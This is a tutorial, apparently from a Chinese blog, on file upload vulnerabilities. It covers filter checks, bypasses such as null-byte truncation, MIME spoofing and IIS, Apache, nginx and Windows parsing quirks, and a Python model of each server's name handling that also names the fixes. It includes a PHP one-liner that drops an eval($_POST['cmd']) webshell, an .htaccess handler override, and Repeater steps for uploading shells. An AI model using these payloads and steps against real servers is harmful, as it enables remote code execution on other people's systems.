Web security: file upload vulnerabilities

1. File filtering methods

File header (magic byte) check: JPEG ==> FF D8 FF E0 (only the first three bytes FF D8 FF are fixed; the fourth depends on the APPn marker), PNG ==> 89 50 4E 47 0D 0A 1A 0A, GIF ==> 47 49 46 38 39 61 ("GIF89a"). Only the first few bytes are inspected, so the rest of the file can be anything.

File type check: the Content-Type HTTP header, also called the media type or MIME type. It is supplied by the client, which makes it the weakest of the three checks.

HTML document:           text/html;
Plain ASCII text:        text/plain;
JPEG image:              image/jpeg;
GIF image:               image/gif;
JavaScript:              application/javascript;
XML file:                application/xml;

A fuller list:
https://www.runoob.com/http/http-content-type.html

File extension (suffix) check: a whitelist or blacklist of suffixes such as .jpeg, .txt, .png. A blacklist misses alternative script extensions; a whitelist is only as good as the code that extracts the extension (see the null-byte, semicolon and trailing-dot tricks below).

2. Common bypass techniques

2.1 Header spoofing, bypassing a simple WAF

If you only rename a script to a.jpg but its content is not a real image, how do you get past a file header check?

Prepend GIF89a to the file, so the first six bytes look like a GIF header.

2.2 Exploiting the file path (parsing vulnerabilities)

Upload a file a.gif, capture the request and modify it in Repeater:

               1. Change the upload path to /a.asp/ (IIS 6.0 directory parsing, see 3.1).

               2. Or change the file name to a.asp;.gif (combined with the IIS 6.0 semicolon parsing vulnerability, see 3.1).

2.3 Null byte truncation (%00)

Upload a.php, capture the request and modify it in Repeater:

                 1. Change the filename to a.jpg.

                 2. Change the upload path to aa.php followed by a space (the space makes the position easy to find in the hex view).

                 Then switch to the Hex tab, locate the path, and change the space (0x20) to 0x00. The filter sees a name ending in .jpg, but a storage layer that treats the path as a C string stops at the NUL and writes aa.php.

Alternatively, write a.php%00.jpg directly, select %00, right-click and choose Convert selection > URL > URL-decode so that a literal NUL byte is sent.

This only works where the server-side runtime still truncates paths at NUL (for PHP, versions before 5.3.4).

2.4 MIME bypass

The Content-Type header is set by the client, so a server that checks only it can be told anything. Upload a real a.jpg, capture the request and modify it in Repeater:

                 Change image/jpeg to text/asp (or, against a server that whitelists image types, leave image/jpeg in place and change only the file name to a script extension).

                 Replace the original image content with a one-line webshell.

2.5 Form submission

Sometimes a page has a file upload field but no submit button. Right-click, inspect the element, and add this code to the form:

                  <input type="submit" value="Submit" name="bb">

Then upload an a.asa file and capture the request (IIS maps .asa to the ASP handler, see 3.1).

2.6 Editor vulnerabilities

Summary of rich-text editor upload vulnerabilities: https://blog.csdn.net/u011781521/article/details/59057759

3. Parsing vulnerabilities

3.1 IIS 6.0 parsing vulnerabilities

     (1) Directory parsing: /xx.asp/xx.jpg

            Create a folder whose name ends in .asp in the web root; any file inside it, whatever its extension (typically an image with a webshell appended, an "image trojan"), is parsed and executed by IIS as ASP.

    (2) File parsing: xx.asp;.jpg

            IIS 6.0 stops reading the file name at the semicolon, so xx.asp;.jpg is treated as xx.asp and executed as an ASP script.

    (3) Alternative executable extensions: asa / cer / cdx

            By default IIS 6.0 maps not only .asp but also .asa, .cer and .cdx to the ASP handler, so a blacklist that only blocks .asp is not enough.

3.2 Apache parsing vulnerability

        When PHP is wired in with AddHandler, Apache evaluates the extensions of a name from right to left: if the rightmost extension is not a recognised type it moves on to the next one, so xx.php.wer.xxxxx is handled as PHP (put a PHP webshell in it). This depends on the configuration: with the <FilesMatch "\.php$"> SetHandler ... </FilesMatch> form used by current distributions, only names that actually end in .php are handed to PHP.

3.3 IIS 7.0 / Nginx < 0.8.03 malformed-name parsing vulnerability

    (1) With PHP running under Fast-CGI in the default configuration (cgi.fix_pathinfo=1), upload a file named xx.jpg containing:

 <?php fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"]);?>');?>

            Then visit xx.jpg/.php. The URI ends in .php, so it is handed to PHP; xx.jpg/.php does not exist, so PHP falls back to xx.jpg and executes it, which writes the one-line webshell shell.php into the same directory. The root cause is the PHP/Fast-CGI configuration rather than a particular server version; setting cgi.fix_pathinfo=0 or adding try_files $uri =404 to the nginx location closes it.

    (2) Another Nginx parsing issue works from left to right on the file name:

        a name such as XXX.jpg.php still ends in .php and is matched by a location ~ \.php$ block, so if the upload filter only looks at the first extension you can bypass the extension restriction and still upload a script.

3.4 .htaccess file parsing

    If Apache honours .htaccess in the upload directory (AllowOverride FileInfo or All) and .htaccess itself can be uploaded, try writing this into it:

<FilesMatch "shell.jpg">
        SetHandler application/x-httpd-php
</FilesMatch>

    Then upload a shell.jpg webshell; Apache now parses shell.jpg as a PHP file.

3.5 Operating system file naming rules

(1) Windows file names that do not follow the naming rules
test.asp.
test.asp (trailing space)
test.php:1.jpg
test.php::$DATA
Windows automatically strips the parts that break its rules: trailing dots and spaces are dropped, and everything after a colon names an NTFS alternate data stream, so the file that appears on disk is test.asp or test.php. A filter that only looks at the submitted name sees an unknown extension and lets it through. (With test.php::$DATA the content goes into the file's main stream; with test.php:1.jpg the visible test.php is created empty and the bytes land in the hidden stream 1.jpg.)
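The following Python model is an added example, not code from the original post or from IIS, Apache, nginx or PHP: it encodes the name-handling rules described in 3.1, 3.2, 3.3 and 3.5 as small functions so you can check, before uploading, what a given server would execute for a given name. The function names, the constructed file lists and the nginx/PHP walk-back logic are assumptions based on the documented behaviour summarised above, not the servers' actual source.

```python
import posixpath

ASP_EXTS = {".asp", ".asa", ".cer", ".cdx"}   # 3.1(3): all mapped to asp.dll on a default IIS 6.0


def _ext(name):
    return posixpath.splitext(name)[1].lower()


def iis6_runs_as_asp(url_path):
    """Model of IIS 6.0 handler selection (3.1).
    (1) directory rule: any file below a directory whose name ends in .asp goes to asp.dll;
    (2) semicolon rule: the file name is cut at the first ';' before its extension is read."""
    parts = url_path.split("/")
    if any(_ext(d) in ASP_EXTS for d in parts[:-1]):
        return True
    return _ext(parts[-1].split(";", 1)[0]) in ASP_EXTS


def apache_handler(filename, addhandler, filesmatch=False):
    """Model of Apache multi-extension handling (3.2) for names like xx.php.wer.xxxxx.
    addhandler maps extensions to handlers, as 'AddHandler application/x-httpd-php .php' does.
    mod_mime looks at every extension and, for the handler, the rightmost *recognised* one
    wins while unknown extensions are ignored; scanning right to left and stopping at the
    first known extension gives the same answer. With <FilesMatch "\\.php$"> SetHandler ...
    only names that really end in .php are handed to PHP."""
    if filesmatch:
        return "php" if filename.lower().endswith(".php") else None
    for e in reversed(filename.split(".")[1:]):
        if "." + e.lower() in addhandler:
            return addhandler["." + e.lower()]
    return None


def php_fix_pathinfo(uri, existing_files, fix_pathinfo=True):
    """Model of 3.3: nginx 'location ~ \\.php$' matches /uploads/xx.jpg/.php and sends it as
    SCRIPT_FILENAME. With cgi.fix_pathinfo=1 (the PHP default) the file does not exist, so PHP
    drops one trailing path component at a time until it finds a real file, runs that, and
    exposes the rest as PATH_INFO. With fix_pathinfo=0 (or 'try_files $uri =404' in nginx)
    only an existing script is ever executed. Returns (script, path_info) or (None, None)."""
    if not fix_pathinfo:
        return (uri, "") if uri in existing_files else (None, None)
    path, info = uri, ""
    while path not in ("", "/"):
        if path in existing_files:
            return path, info
        path, tail = posixpath.split(path)
        info = "/" + tail + info
    return None, None


def windows_stored_name(name):
    """Model of 3.5: Win32 drops trailing dots and spaces from a file name, and ':' introduces
    an NTFS alternate data stream. Returns (name on disk, stream). '' or '::$DATA' means the
    bytes land in the file itself; ':1.jpg' means test.php is created empty and the bytes go
    into the hidden stream 1.jpg."""
    base, sep, stream = name.partition(":")
    return base.rstrip(". "), sep + stream


if __name__ == "__main__":
    # Constructed inputs for the demo; nothing here touches a real server.
    print("IIS 6 /xx.asp/xx.jpg:", iis6_runs_as_asp("/xx.asp/xx.jpg"))
    print("IIS 6 /xx.asp;.jpg:", iis6_runs_as_asp("/xx.asp;.jpg"))
    print("Apache AddHandler xx.php.wer.xxxxx:", apache_handler("xx.php.wer.xxxxx", {".php": "php"}))
    print("Apache FilesMatch xx.php.wer.xxxxx:", apache_handler("xx.php.wer.xxxxx", {".php": "php"}, True))
    print("nginx+PHP /uploads/xx.jpg/.php:", php_fix_pathinfo("/uploads/xx.jpg/.php", {"/uploads/xx.jpg"}))
    print("same, fix_pathinfo=0:", php_fix_pathinfo("/uploads/xx.jpg/.php", {"/uploads/xx.jpg"}, False))
    for n in ("test.asp.", "test.asp ", "test.php:1.jpg", "test.php::$DATA"):
        print(repr(n), "->", windows_stored_name(n))
```

Each function takes the weak configuration as the default and the corrected one as a parameter (filesmatch=True, fix_pathinfo=False), so the same call shows both what the trick yields on a vulnerable host and why the fix removes it; the IIS 6.0 and Windows rules have no configuration switch, which is why the only defence there is to never keep the client's file name.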


Source: https://blog.csdn.net/xlsj228/article/details/90756195